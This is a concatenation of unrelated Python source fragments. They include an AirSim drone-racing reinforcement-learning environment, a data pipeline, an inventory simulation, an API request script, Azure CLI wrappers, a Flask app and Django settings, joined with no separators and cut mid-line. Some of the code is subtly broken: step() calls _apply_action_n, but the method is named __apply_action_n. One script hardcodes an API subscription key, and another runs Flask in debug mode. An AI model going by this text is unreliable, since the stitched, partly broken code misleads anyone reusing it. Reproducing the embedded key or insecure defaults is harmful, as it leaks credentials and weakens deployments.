drone-centric observations, the gravity vector (ie orientation of the drone) is needed elt['gravity_angles_dc'] = spaces.Box(low=-np.inf, high=np.inf, shape=(2,)) if self.obs_coord_id == 0 or self.obs_coord_id == 3: # in global observations, the position and orientation are needed elt['position_glo'] = spaces.Box(low=-np.inf, high=np.inf, shape=(3,)) elt['orientation_glo'] = spaces.Box(low=-2.0, high=2.0, shape=(4,)) if self.act_in_obs: elt['action'] = self._get_action_space()[0] selt = spaces.Dict(elt) tup = (selt,) * self.nb_drones return spaces.Tuple(tup) def _get_imgs(self, camera_name, drone_idx): """ gets the current image from camera_name, drone_name appends it to the history (builds it the first time) returns a copy of the history in a numpy array """ cpt = 0 try_again = True while try_again and cpt <= MAX_GETIMAGES_TRIALS: request = [airsim.ImageRequest(camera_name, airsim.ImageType.Scene, False, False)] response = self.airsim_client.simGetImages(request, vehicle_name=self.drones_names[drone_idx]) rec_img_height = response[0].height rec_img_width = response[0].width if rec_img_height >= 1 and rec_img_width >= 1: try_again = False else: cpt += 1 print_with_pid("DEBUG: simGetImages failed, retrying...") img_rgb_1d1 = np.fromstring(response[0].image_data_uint8, dtype=np.uint8) img = img_rgb_1d1.reshape(rec_img_height, rec_img_width, 3) if len(self.histories[drone_idx]) != 0: self.histories[drone_idx].pop() self.histories[drone_idx].appendleft(img) else: for _ in range(self.history_length): self.histories[drone_idx].appendleft(img) return np.asarray(self.histories[drone_idx]) def _get_obs(self, drone_idx, action): # TODO: tiers 2 and 3 """ Returns the observation of drone drone_idx in the tier we are considering """ # print_with_pid("DEBUG: Getting obs, drone_idx=", drone_idx) rf = self.reward_functions[drone_idx] curr_idx = rf.current_objective_idx if curr_idx >= len(rf.objectives): # track complete curr_idx = len(rf.objectives) - 1 next_idx = curr_idx + 1 if next_idx >= len(rf.objectives): next_idx = curr_idx if self.tier != 2: opp_rf = self.reward_functions[1 - drone_idx] drone_base_position = rf.current_position drone_base_orientation = rf.current_kinematics.orientation elt = {} if self.tier <= 1: # tiers 0 and 1 if self.obs_coord_id <= 1: # drone-centric elt['linear_velocity_dc'] = basis_oriented_vector(drone_base_orientation, rf.current_kinematics.linear_velocity).to_numpy_array() elt['angular_velocity_dc'] = basis_oriented_vector(drone_base_orientation, rf.current_kinematics.angular_velocity).to_numpy_array() elt['linear_acceleration_dc'] = basis_oriented_vector(drone_base_orientation, rf.current_kinematics.linear_acceleration).to_numpy_array() elt['angular_acceleration_dc'] = basis_oriented_vector(drone_base_orientation, rf.current_kinematics.angular_acceleration).to_numpy_array() elt['rival_position_dc'] = basis_oriented_vector(drone_base_orientation, opp_rf.current_position - drone_base_position).to_numpy_array() elt['rival_orientation_dc'] = basis_oriented_quaternion(drone_base_orientation, opp_rf.current_kinematics.orientation).to_numpy_array() elt['rival_linear_velocity_dc'] = basis_oriented_vector(drone_base_orientation, opp_rf.current_kinematics.linear_velocity).to_numpy_array() elt['rival_angular_velocity_dc'] = basis_oriented_vector(drone_base_orientation, opp_rf.current_kinematics.angular_velocity).to_numpy_array() elt['rival_linear_acceleration_dc'] = basis_oriented_vector(drone_base_orientation, opp_rf.current_kinematics.linear_acceleration).to_numpy_array() elt['rival_angular_acceleration_dc'] = basis_oriented_vector(drone_base_orientation, opp_rf.current_kinematics.angular_acceleration).to_numpy_array() elt['target_position_dc'] = basis_oriented_vector(drone_base_orientation, rf.objectives[curr_idx][0].position - drone_base_position).to_numpy_array() elt['target_orientation_dc'] = basis_oriented_quaternion(drone_base_orientation, rf.objectives[curr_idx][0].orientation).to_numpy_array() elt['next_target_position_dc'] = basis_oriented_vector(drone_base_orientation, rf.objectives[next_idx][0].position - drone_base_position).to_numpy_array() elt['next_target_orientation_dc'] = basis_oriented_quaternion(drone_base_orientation, rf.objectives[next_idx][0].orientation).to_numpy_array() if self.obs_coord_id == 0 or self.obs_coord_id == 2: # NED drone_ned_orientation = quat_to_ned_quat(drone_base_orientation) elt['linear_velocity_ned'] = basis_oriented_vector(drone_ned_orientation, rf.current_kinematics.linear_velocity).to_numpy_array() elt['angular_velocity_ned'] = basis_oriented_vector(drone_ned_orientation, rf.current_kinematics.angular_velocity).to_numpy_array() elt['linear_acceleration_ned'] = basis_oriented_vector(drone_ned_orientation, rf.current_kinematics.linear_acceleration).to_numpy_array() elt['angular_acceleration_ned'] = basis_oriented_vector(drone_ned_orientation, rf.current_kinematics.angular_acceleration).to_numpy_array() elt['rival_position_ned'] = basis_oriented_vector(drone_ned_orientation, opp_rf.current_position - drone_base_position).to_numpy_array() elt['rival_orientation_ned'] = basis_oriented_quaternion(drone_ned_orientation, opp_rf.current_kinematics.orientation).to_numpy_array() elt['rival_linear_velocity_ned'] = basis_oriented_vector(drone_ned_orientation, opp_rf.current_kinematics.linear_velocity).to_numpy_array() elt['rival_angular_velocity_ned'] = basis_oriented_vector(drone_ned_orientation, opp_rf.current_kinematics.angular_velocity).to_numpy_array() elt['rival_linear_acceleration_ned'] = basis_oriented_vector(drone_ned_orientation, opp_rf.current_kinematics.linear_acceleration).to_numpy_array() elt['rival_angular_acceleration_ned'] = basis_oriented_vector(drone_ned_orientation, opp_rf.current_kinematics.angular_acceleration).to_numpy_array() elt['target_position_ned'] = basis_oriented_vector(drone_ned_orientation, rf.objectives[curr_idx][0].position - drone_base_position).to_numpy_array() elt['target_orientation_ned'] = basis_oriented_quaternion(drone_ned_orientation, rf.objectives[curr_idx][0].orientation).to_numpy_array() elt['next_target_position_ned'] = basis_oriented_vector(drone_ned_orientation, rf.objectives[next_idx][0].position - drone_base_position).to_numpy_array() elt['next_target_orientation_ned'] = basis_oriented_quaternion(drone_ned_orientation, rf.objectives[next_idx][0].orientation).to_numpy_array() if self.obs_coord_id == 0 or self.obs_coord_id == 3: # global elt['linear_velocity_glo'] = rf.current_kinematics.linear_velocity.to_numpy_array() elt['angular_velocity_glo'] = rf.current_kinematics.angular_velocity.to_numpy_array() elt['linear_acceleration_glo'] = rf.current_kinematics.linear_acceleration.to_numpy_array() elt['angular_acceleration_glo'] = rf.current_kinematics.angular_acceleration.to_numpy_array() elt['rival_position_glo'] = opp_rf.current_position.to_numpy_array() elt['rival_orientation_glo'] = opp_rf.current_kinematics.orientation.to_numpy_array() elt['rival_linear_velocity_glo'] = opp_rf.current_kinematics.linear_velocity.to_numpy_array() elt['rival_angular_velocity_glo'] = opp_rf.current_kinematics.angular_velocity.to_numpy_array() elt['rival_linear_acceleration_glo'] = opp_rf.current_kinematics.linear_acceleration.to_numpy_array() elt['rival_angular_acceleration_glo'] = opp_rf.current_kinematics.angular_acceleration.to_numpy_array() elt['target_position_glo'] = rf.objectives[curr_idx][0].position.to_numpy_array() elt['target_orientation_glo'] = rf.objectives[curr_idx][0].orientation.to_numpy_array() elt['next_target_position_glo'] = rf.objectives[next_idx][0].position.to_numpy_array() elt['next_target_orientation_glo'] = rf.objectives[next_idx][0].orientation.to_numpy_array() elt['target_dims_glo'] = rf.objectives[curr_idx][1].to_numpy_array() elt['next_target_dims_glo'] = rf.objectives[next_idx][1].to_numpy_array() if self.tier == 0: # additional ground truthes that are not in tier 1 for dataset collection elt['front_camera_dc'] = self._get_imgs(f"fpv_cam_{drone_idx + 1}", drone_idx) else: # tiers 2 and 3 if self.obs_coord_id <= 1: # drone-centric elt['linear_velocity_dc'] = basis_oriented_vector(drone_base_orientation, rf.current_kinematics.linear_velocity).to_numpy_array() elt['angular_velocity_dc'] = basis_oriented_vector(drone_base_orientation, rf.current_kinematics.angular_velocity).to_numpy_array() elt['linear_acceleration_dc'] = basis_oriented_vector(drone_base_orientation, rf.current_kinematics.linear_acceleration).to_numpy_array() elt['angular_acceleration_dc'] = basis_oriented_vector(drone_base_orientation, rf.current_kinematics.angular_acceleration).to_numpy_array() if self.obs_coord_id == 0 or self.obs_coord_id == 2: # NED drone_ned_orientation = quat_to_ned_quat(drone_base_orientation) elt['linear_velocity_ned'] = basis_oriented_vector(drone_ned_orientation, rf.current_kinematics.linear_velocity).to_numpy_array() elt['angular_velocity_ned'] = basis_oriented_vector(drone_ned_orientation, rf.current_kinematics.angular_velocity).to_numpy_array() elt['linear_acceleration_ned'] = basis_oriented_vector(drone_ned_orientation, rf.current_kinematics.linear_acceleration).to_numpy_array() elt['angular_acceleration_ned'] = basis_oriented_vector(drone_ned_orientation, rf.current_kinematics.angular_acceleration).to_numpy_array() if self.obs_coord_id == 0 or self.obs_coord_id == 3: # global elt['linear_velocity_glo'] = rf.current_kinematics.linear_velocity.to_numpy_array() elt['angular_velocity_glo'] = rf.current_kinematics.angular_velocity.to_numpy_array() elt['linear_acceleration_glo'] = rf.current_kinematics.linear_acceleration.to_numpy_array() elt['angular_acceleration_glo'] = rf.current_kinematics.angular_acceleration.to_numpy_array() elt['front_camera_dc'] = self._get_imgs(f"fpv_cam_{drone_idx + 1}", drone_idx) if self.obs_coord_id <= 2: # in drone-centric and ned observations, the gravity vector is needed (orientation of the drone) elt['gravity_angles_dc'] = np.array(quaternion_to_roll_pitch_without_yaw(drone_base_orientation)) if self.obs_coord_id == 0 or self.obs_coord_id == 3: # in global observations, the position and orientation are needed elt['position_glo'] = drone_base_position.to_numpy_array() elt['orientation_glo'] = drone_base_orientation.to_numpy_array() if self.act_in_obs: elt['action'] = action if self.obs_preprocessor is not None: elt = self.obs_preprocessor(elt) return elt def _update_states_and_get_rewards_and_dones(self): # print_with_pid("DEBUG: update state and get rew and dones") for reward_function in self.reward_functions: reward_function.update_state() rew_n = [] done_n = [] for reward_function in self.reward_functions: rew_n.append(reward_function.get_reward()) # can change parameters here done_n.append(reward_function.done) return rew_n, done_n def _gates_randomization(self): """ This randomizes gates during reset() Also contains a workaround that makes the last gate unreachable to avoid airsim bugs/crashes on their reset function """ if self.current_objectives is None: pass elif self.level_name == 'Soccer_Field_Medium': self.current_objectives = copy.deepcopy(self.initial_objectives) # delete last gate: # gate_pose = self.current_objectives[-1][0] # gate_pose.position.x_val = 1000.0 # gate_pose.position.y_val = 1000.0 # gate_pose.position.z_val = 1000.0 # self.airsim_client.simSetObjectPose(self.gates_names[-1], gate_pose) # self.current_objectives.pop() # randomize first gate (old) # randomize all gates nb_gates = len(self.current_objectives) gate_pose = self.current_objectives[0][0] x_noise = (np.random.random() - 0.5) * 10.0 # meters y_noise = (np.random.random() - 0.5) * 10.0 + 5.0 # meters z_noise = (np.random.random() - 0.5) * -2.0 # meters gate_pose.position.x_val += x_noise gate_pose.position.y_val += y_noise gate_pose.position.z_val = min(gate_pose.position.z_val + z_noise, 0.0) #check out here x_euler_angle_noise = 0.0 # radian y_euler_angle_noise = 0.0 # radian z_euler_angle_noise = (np.random.random() - 0.5) * 0.5 * np.pi # radian quaternion_noise = euler_to_quaternion(x_euler_angle_noise, y_euler_angle_noise, z_euler_angle_noise) gate_pose.orientation = quaternion_noise # FIXME: the initial pose of the first gate is by default an invalid orientation (w=1.0 and axis=0.0) that cannot be rotated self.airsim_client.simSetObjectPose(self.gates_names[0], gate_pose) for i in range(nb_gates-1): # randomize second gate: previous_gate_pose = copy.deepcopy(gate_pose) self.current_objectives[i+1][0] = previous_gate_pose gate_pose = self.current_objectives[i+1][0] x_noise = (np.random.random() - 0.5) * 10.0 # meters y_noise = (np.random.random() - 0.5) * 10.0 + 10.0 # meters z_noise = (np.random.random() - 0.5) * -2.0 # meters vector_noise = basis_oriented_vector(gate_pose.orientation.inverse(), airsim.Vector3r(x_val=x_noise, y_val=y_noise, z_val=0.0)) gate_pose.position = gate_pose.position + vector_noise gate_pose.position.z_val = z_noise x_euler_angle_noise = 0.0 # radian y_euler_angle_noise = 0.0 # radian z_euler_angle_noise = (np.random.random() - 0.5) * 0.5 * np.pi # radian quaternion_noise = euler_to_quaternion(x_euler_angle_noise, y_euler_angle_noise, z_euler_angle_noise) * gate_pose.orientation gate_pose.orientation = quaternion_noise self.airsim_client.simSetObjectPose(self.gates_names[i+1], gate_pose) def _get_args_kwargs_control_method(self, action_n, idx): """ This is where actions are interpreted in order to be passed to the control control_method For example, we convert local actions to global actions for global API functions here control_method_id must be set in _set_control_method_id() also applies action proprocessor if any """ kwargs = {'duration': self.simulated_time_step, 'vehicle_name': self.drones_names[idx]} act = action_n[idx] if self.act_preprocessor is not None: act = self.act_preprocessor(act) if self.control_method_id == 0: # default behavior args = tuple(act) elif self.control_method_id == 1: # moveByVelocityAsync behavior rf = self.reward_functions[idx] drone_base_orientation = rf.current_kinematics.orientation yaw_rate = act[3] if self.act_coord_id == 1: # drone-centric coordinates act_o = basis_oriented_vector(drone_base_orientation.inverse(), airsim.Vector3r(act[0], act[1], act[2])) # TODO: check that this is correct elif self.act_coord_id == 2: # NED drone_ned_orientation = quat_to_ned_quat(drone_base_orientation) act_o = basis_oriented_vector(drone_ned_orientation.inverse(), airsim.Vector3r(act[0], act[1], act[2])) # TODO: check that this is correct else: # global coordinates act_o = airsim.Vector3r(act[0], act[1], act[2]) args = tuple([act_o.x_val, act_o.y_val, act_o.z_val]) kwargs['yaw_mode'] = {'is_rate': True, 'yaw_or_rate': yaw_rate} elif self.control_method_id == 2: # moveByRollPitchYawrateZAsync behavior rf = self.reward_functions[idx] act_f = copy.deepcopy(act) # ned and global coordinates if self.act_coord_id == 1 or self.act_coord_id == 2: # drone-centric or NED coordinates self.z_targets[idx] = self.z_targets[idx] + act[3] act_f[3] = self.z_targets[idx] args = tuple(act_f) return args, kwargs def _clip_action_n(self, action_n): for i, action in enumerate(action_n): if not self.action_space[i].contains(action): print(f"DEBUG: action_n:{action_n} not in action space:{self.action_space} clipping...") for j, low_bound in enumerate(self.low_bounds): diff_low = action[j] - low_bound if diff_low < 0: action_n[i][j] = low_bound for j, high_bound in enumerate(self.high_bounds): diff_high = high_bound - action[j] if diff_high < 0: action_n[i][j] = high_bound return action_n def __apply_action_n(self, action_n, idxs): """ This function applies the control API to all the drones with parameters action_n idxs is a [] of randomly sorted drone indices action bounds need to be chosen according to the chosen API control when instantiating the gym environment !: this function is the target of a Thread just before step() returns in the RTRL setting when self.act_thread is True In this specific case, all subsequent calls to the environment will join this Thread for general thread-safety """ # print_with_pid('DEBUG: apply action_n') self.airsim_client.simPause(True) if self.synchronous_actions else self.airsim_client.simPause(False) action_n = self._clip_action_n(action_n) f_n = [] for i in idxs: ff = None if not self.reward_functions[i].done: args, kwargs = self._get_args_kwargs_control_method(action_n, i) ff = self.control_method(*args, **kwargs) f_n.append(ff) if self.time_step_method_id == 1: # continueForTime / sleep method # FIXME: the actual time-step is hardware-dependent here because clockspeed is not really respected in the simulator, and simContinueForTime is bug-prone if self.time_stop: if not self.synchronous_actions: self.airsim_client.simPause(True) self.airsim_client.simContinueForTime(self.cpu_time_step) else: if self.synchronous_actions: self.airsim_client.simPause(False) time.sleep(self.cpu_time_step) else: # join method # FIXME: things happen in simulation during the time it takes to retrieve the join status and to send the simPause command if self.synchronous_actions: self.airsim_client.simPause(False) for f in f_n: if f is not None: f.join() if self.time_stop: self.airsim_client.simPause(True) def _get_states(self, action_n): """ updates the states and returns the transition outcome """ # print_with_pid('DEBUG: get transition') self.airsim_client.simPause(True) if self.synchronous_states else self.airsim_client.simPause(False) rew_n, done_n = self._update_states_and_get_rewards_and_dones() obs_n = [] info_n = [] for drone_idx in range(len(self.drones_names)): obs_n.append(self._get_obs(drone_idx, action_n[drone_idx])) info_n.append({}) # we can put gym debug info here if self.current_step >= self.ep_max_length: for i in range(len(done_n)): done_n[i] = True if not self.death_occurred: for i in range(len(done_n)): if self.reward_functions[i].death: # TODO: check that the dead vehicle has indeed been detected as dead in the software self.airsim_client.disarm(vehicle_name=self.drones_names[i]) self.death_occurred = True self.airsim_client.simPause(True) if self.time_stop else self.airsim_client.simPause(False) return obs_n, rew_n, done_n, info_n def _step_common_begin(self): # TODO : cap action whithin self.action_space """ This function outputs a random order on drones (for calling the API in random order in real time control) """ self.current_step += 1 idxs = list(range(self.nb_drones)) random.shuffle(idxs) return idxs # gym user API functions: def reset(self): # TODO: add support for random initial drone placement and gate randomization """ Use reset() to reset the environment !: compatible only with 1 or 2 drones """ self._join_act_thread() # print_with_pid("DEBUG: called env reset()") if not self.initialized: # print_with_pid("DEBUG: rllib compatibility") return self._initialize() self.current_step = 0 self.death_occurred = False self.z_targets = [self.default_z_target,] * self.nb_drones # caution: airsim_client.reset() seems to make Airsim crash quite often # see: https://github.com/microsoft/AirSim-NeurIPS2019-Drone-Racing/issues/60 : # signal.alarm(RESET_TIMEOUT + 1) # enable alarm # print_with_pid("DEBUG: called simPause(False)") self.airsim_client.simPause(False) # print_with_pid("DEBUG: called sim reset()") self.airsim_client.reset() # print_with_pid("DEBUG: called simResetRace()") self.airsim_client.simResetRace() time.sleep(SLEEP_TIME_AT_RESETRACE) # print_with_pid("DEBUG: called simPause(True)") self.airsim_client.simPause(True) # print_with_pid("DEBUG: called _gates_randomization()") self._gates_randomization() for drone_name in self.drones_names: self.airsim_client.enableApiControl(vehicle_name=drone_name) self.airsim_client.arm(vehicle_name=drone_name) obs = [] self.reward_functions = [] # must be initialized after first call to simResetRace() for tiers 2 and 3 for drone_idx, drone_name in enumerate(self.drones_names): self.reward_functions.append(rf.RewardFunction(airsim_client=self.airsim_client, vehicle_name=drone_name, base_offset=self.drones_offsets[drone_idx], objectives=self.current_objectives, param_dict=self.rf_config)) if len(self.reward_functions) == 2: # in the multiagent setting, we have to set opponent reward functions self.reward_functions[0].set_opponent_RewardFunction(self.reward_functions[1]) self.reward_functions[1].set_opponent_RewardFunction(self.reward_functions[0]) for drone_idx in range(len(self.drones_names)): obs.append(self._get_obs(drone_idx, self.default_act)) # print_with_pid(f'DEBUG: called simStartRace(tier={self.tier})') self.airsim_client.simStartRace(tier=1 if self.tier == 0 else self.tier, competitor=False) # must be called the first time after instantiating reward functions or reward functions will be broken in tier 2 and 3 (because of noisy gate estimates) self.airsim_client.simPause(True) if self.time_stop else self.airsim_client.simPause(False) # print_with_pid('DEBUG: PauseEnd') # print_with_pid('DEBUG: end reset') return obs def step(self, action): """ Call this function to perform a step :param action: numpy.array[n_drones][n_actions] values for each action of each drone returns: obs_n, rew_n, done_n, either of the CURRENT (if not real_time) or PREVIOUS (if real_time) transition: see real-time RL """ self._join_act_thread() idxs = self._step_common_begin() if not self.real_time: self._apply_action_n(action, idxs) obs_n, rew_n, done_n, info_n = self._get_states(action) if self.real_time: self._apply_action_n(action, idxs) return obs_n, rew_n, done_n, info_n def stop(self): self._join_act_thread() if self.process is not None: print_with_pid(f"DEBUG: call to stop(). Calling _kill_simulator()") self._kill_simulator() self.airsim_client = None self.process = None def render(self, mode='human', camera_name='fpv_cam_1', drone_idx=0): # TODO: render should visually show the current state of the environment (should not use simGetImages) self._join_act_thread() request = [airsim.ImageRequest(camera_name, airsim.ImageType.Scene, False, False)] response = self.airsim_client.simGetImages(request, vehicle_name=self.drones_names[drone_idx]) img_rgb_1d1 = np.fromstring(response[0].image_data_uint8, dtype=np.uint8) img = img_rgb_1d1.reshape(response[0].height, response[0].width, 3) print("image shape: ", img.shape) Alexjmsherman/Data_Pipeline __author__ = "alsherman" import logging from .sources_metadata.source_metadata import SourceMetadata from Get_Data import download_data from Export_Data.create_csv import CSVCreator logger = logging.getLogger(__name__) class DataPipeline: """ ETL processes for each data source. Downloads data, Cleans data, and creates a CSV. Five steps process: 1. Get metadata about the data source (e.g. name, url, data format) 2. Instantiate a DownloadData class, which determines the appropriate extract methods based on data format 3. Download the data 4. Apply custom data cleaning functions 5. Export the data """ def __init__(self, name, sources_metadata, data_category, func, local=False): """ :param name: the name of the script :param sources_metadata: metadata about the source, used to identify correct download methods :param data_category: data category, used specific file to download when one source has many files :param func: custom data cleaning function :param local: specifies whether to use a local file or download data (used for testing purposes) """ self.name = name self.sources_metadata = sources_metadata self.data_category = data_category self.local = local self._func = func def run_pipeline(self): """ get dataset metadata, download data, clean data, and export data """ logger.info('start {}'.format(self.name)) source_metadata = SourceMetadata(sources_metadata=self.sources_metadata, data_category=self.data_category, local=self.local) downloader = download_data.DownloadData(source_metadata) source_metadata.downloaded_data = downloader.download(source_metadata.download_type) source_metadata.dataframe = self._func(source_metadata) CSVCreator(source_metadata).create_csv(self.sources_metadata) logger.info('completed {}'.format(self.name)) import matplotlib.pyplot as plt import random import simpy class Model: def __init__(self, env, op, oq, lt, init): self.env = env self.op = op # ordering point self.oq = oq # order quantity self.lt = lt # replenishment lead time self.at_hand = init # how many items you have at hand self.loss = 0 # opportunity loss self.orders = [] # list of back orders @property def total(self): return sum(self.orders) +self.at_hand def print_state(self): print('[{}] current level: {}, back order: {}, lost sales: {} '.format(round(self.env.now), self.at_hand, self.orders, self.loss)) self.env.log.extend() def seller(self): while True: yield self.env.timeout(random.expovariate(1)) if self.at_hand > 0: self.at_hand -= 1 # sell an item to the customer self.env.stocktake.succeed() # activate the stocktaker else: self.loss += 1 # sorry we are out of stock self.print_state() # state after dealing with each customer def stocktaker(self): while True: self.env.stocktake = self.env.event() # create the signal yield self.env.stocktake if self.total <= self.op: self.orders.append(self.oq) self.env.process(self.deliverer()) # activate deliverer def deliverer(self): self.print_state() # state after an order is placed yield self.env.timeout(self.lt) if len(self.orders) > 0: self.at_hand += self.orders.pop(0) self.print_state() # state after an order is fulfilled class Log: def __init__(self, env): self.env = env self.time = [] self.at_hand = [] self.loss = [] self.total = [] self.extend() def extend(self): self.time.append(self.env.now) self.at_hand.append(self.env.model.at_hand) self.loss.append(self.env.model.loss) self.total.append(self.env.model.total) def plot_log(self): plt.plot(self.time, self.at_hand, drawstyle = "steps-post") plt.xlabel("time (minute)") plt.ylabel("number of items") plt.show() def main(): env = simpy.Environment() env.model = Model(env, 10, 20, 10, 20) # op, oq, lt, init env.log = Log(env) env.process(env.model.seller()) env.process(env.model.stocktaker()) env.run(until=200) env.log.plot_log() if __name__ == "__main__": main() import requests import json key = "9247ef2009ba4e86a10874c39a1f1868" #relative path to your new query file queryFilePath = '/path/to/your/query.json' headerDict = {} paramDict = {} #baseUrl = 'https' + '://' + 'api.yuuvis.io' objectId = '805715d6-9ed9-4069-8922-bb587ce9d652' baseUrl = 'https' + '://' + 'api.yuuvis.io' header_name = 'Content-Type' headerDict['Content-Type'] = 'application/json' header_name = 'Ocp-Apim-Subscription-Key' headerDict['Ocp-Apim-Subscription-Key'] = key session = requests.Session() response = session.get(str(baseUrl+'/dms/objects/'+objectId+'/contents/file'), headers=headerDict) print(response.text)10-100 class Solution: def deserialize(self, s): stack, num, last = [], "", None for c in s: if c.isdigit() or c == "-": num += c elif c == "," and num: stack[-1].add(NestedInteger(int(num))) num = "" elif c == "[": elem = NestedInteger() if stack: stack[-1].add(elem) stack.append(elem) elif c == "]": if num: stack[-1].add(NestedInteger(int(num))) num = "" last = stack.pop() return last if last else NestedInteger(int(num))from .... pyaz_utils import _call_az def create(gateway_name, name, public_cert_data, resource_group): ''' Upload a root certificate. Required Parameters: - gateway_name -- Virtual network gateway name - name -- Root certificate name - public_cert_data -- Base64 contents of the root certificate file or file path. - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=` ''' return _call_az("az network vnet-gateway root-cert create", locals()) def delete(gateway_name, name, resource_group): ''' Delete a root certificate. Required Parameters: - gateway_name -- Virtual network gateway name - name -- Root certificate name - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=` ''' return _call_az("az network vnet-gateway root-cert delete", locals()) #!python """ validation check for checking the password """ import time import getpass def check_password(password, address): """ This will check to see if a password is given or if one needs to be asked for Args: password (None|str) : this will be None if no password is given or check to make sure a string otherwise. address (str) : string of the address getting password for return: str : password either validated or gotten from a user """ while True: if not isinstance(address, str): raise ValueError( f"You gave me an address of {address} of type {type(address)}. It needs to be a string." ) if password is None or not isinstance(password, str): password = getpass.getpass( f"Please enter your password for system at IP {address}: " ) if password is not None and isinstance(password, str): if len(password) < 513: if len(password) > 0: return password else: print( f"Password was less than 1 character. Please re-enter the CORRECT password" ) else: print( f"Password was greater than 512 characters." f" Please re-enter the CORRECT password because no password is really that long." ) password = None if __name__ == "__main__": start_time = time.time() password_list_to_test = [ None, 1, "a", "asdlfjalsjdf;lajsdfljlaksjfklla;dlfasl;dfj;alsjdf;lajsdfl;jaslfdjl;asj;dflasjdlfj;alsdlf;asldfj;asldfj;lasjdfl;ajsfld;jasfdoasydfiahsidfasbfmasfjbasfbasbfbasfdbasbfkabsdkfjbaksjdbfkasbfkbaskfdjbaksfbkasbfkjasbdfkbasdkfbaksjfkasfjabfkjabsdfkbaskdkjasbdkf", "asdlfjalsjdf;lajsdfljlaksjfklla;dlfasl;dfj;alsjdf;lajsdfl;jaslfdjl;asj;dflasjdlfj;alsdlf;asldfj;asldfj;lasjdfl;ajsfld;jasfdoasydfiahsidfasbfmasfjbasfbasbfbasfdbasbfkabsdkfjbaksjdbfkasbfkbaskfdjbaksfbkasbfkjasbdfkbasdkfbaksjfkasfjabfkjabsdfkbaskdkjasbdkfasdfasdfasdlfjalsjdf;lajsdfljlaksjfklla;dlfasl;dfj;alsjdf;lajsdfl;jaslfdjl;asj;dflasjdlfj;alsdlf;asldfj;asldfj;lasjdfl;ajsfld;jasfdoasydfiahsidfasbfmasfjbasfbasbfbasfdbasbfkabsdkfjbaksjdbfkasbfkbaskfdjbaksfbkasbfkjasbdfkbasdkfbaksjfkasfjabfkjabsdfkbaskdkjasbdkfasdfasdfasdlfjalsjdf;lajsdfljlaksjfklla;dlfasl;dfj;alsjdf;lajsdfl;jaslfdjl;asj;dflasjdlfj;alsdlf;asldfj;asldfj;lasjdfl;ajsfld;jasfdoasydfiahsidfasbfmasfjbasfbasbfbasfdbasbfkabsdkfjbaksjdbfkasbfkbaskfdjbaksfbkasbfkjasbdfkbasdkfbaksjfkasfjabfkjabsdfkbaskdkjasbdkfasdfasdf", ] address_for_test = "192.168.1.65" for password in password_list_to_test: print(f"The password is : {check_password(password, address_for_test)}") duration = time.time() - start_time print(f"Duration to run was {duration}") combofish/chips-get #!/usr/bin/env python # coding:utf-8 # Filename: answer-flask.py from flask import Flask, render_template, request app = Flask(__name__) @app.route('/') def home(): return "It's alive!" @app.route('/home') def anotherhome(): kwargs = {} kwargs["thing"] = request.args.get('thing') kwargs["height"] = request.args.get('height') kwargs["color"] = request.args.get('color') return render_template('home.html',**kwargs) app.run(port=5000,debug=True) from django.contrib import admin from .models import ImageModel, PixelCount class ImageModelAdmin(admin.ModelAdmin): list_display = ("image", "id", "upload_date") search_fields = ("upload_date",) list_filter = ("upload_date",) empty_value_display = "-пусто-" class PixelCountAdmin(admin.ModelAdmin): list_display = ("image", "id", "image_id") search_fields = ("colors",) list_filter = ("image",) empty_value_display = "-пусто-" admin.site.register(ImageModel, ImageModelAdmin) admin.site.register(PixelCount, PixelCountAdmin) # -*- coding: utf-8 -*- """ Created on Mon May 20 18:07:24 2019 @author: AGNPT-M-001 """ # %% import liesl from dataclasses import dataclass from phase_triggered_tms.tms_preparation.tools import eeg_channels import localite.api from luckyloop.client import LuckyClient import pylsl @dataclass class Environment(): coil = None #:localite.Coil(host="172.16.58.3") marker = None #:liesl.open_streams(type='Markers', # name="BrainVision RDA Markers", # hostname='Patrick')[0] bvr = None #:liesl.open_streams(type='EEG', # name="BrainVision RDA", # hostname='Patrick')[0] lucky = None buffer = None #:liesl.RingBuffer(bvr, duration_in_ms=2000) def setup(self): self.buffer.start() labels = liesl.get_channel_map(pylsl.StreamInlet(self.bvr)) self.labels = list(labels.keys()) self.emg_labels = [l for l in self.labels if l not in eeg_channels()] self.eeg_labels = [l for l in self.labels if l in eeg_channels()]#! /usr/bin/env python import sys if len(sys.argv) > 1: code = int(sys.argv[1]) else: code = 0 text = sys.stdin.read() sys.stdout.write(text) sys.stderr.write(text) sys.exit(code) """ Django settings for comics project. """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = os.getenv('DJANGO_SECRET', 'SAMPLE_KEY_PLEASE_CHANGE') # SECURITY WARNING: don't run with debug turned on in production! DEBUG = int(os.getenv('DJANGO_DEBUG', '0')) CSRF_COOKIE_SECURE = not DEBUG SESSION_COOKIE_SECURE = not DEBUG SECURE_SSL_REDIRECT = not DEBUG # Ad configuration ADS_TXT_URL = os.getenv('DJANGO_ADS_TXT_URL', None) # Hosts ALLOWED_HOSTS = ['*'] # Apps INSTALLED_APPS = [ 'comics.admin.ComicsAdminConfig', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'apps.comics.apps.ComicsConfig', ] # Middleware MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'apps.comics.middleware.ComicUrlMiddleware', ] # Paths to config modules ROOT_URLCONF = 'comics.urls' WSGI_APPLICATION = 'comics.wsgi.application' # Templates TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] # Database DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': '/var/lib/comics/comics.sqlite3', } } DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField' # Password validation AUTH_PASSWORD_VALIDATORS = [ {'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'}, {'NAME': 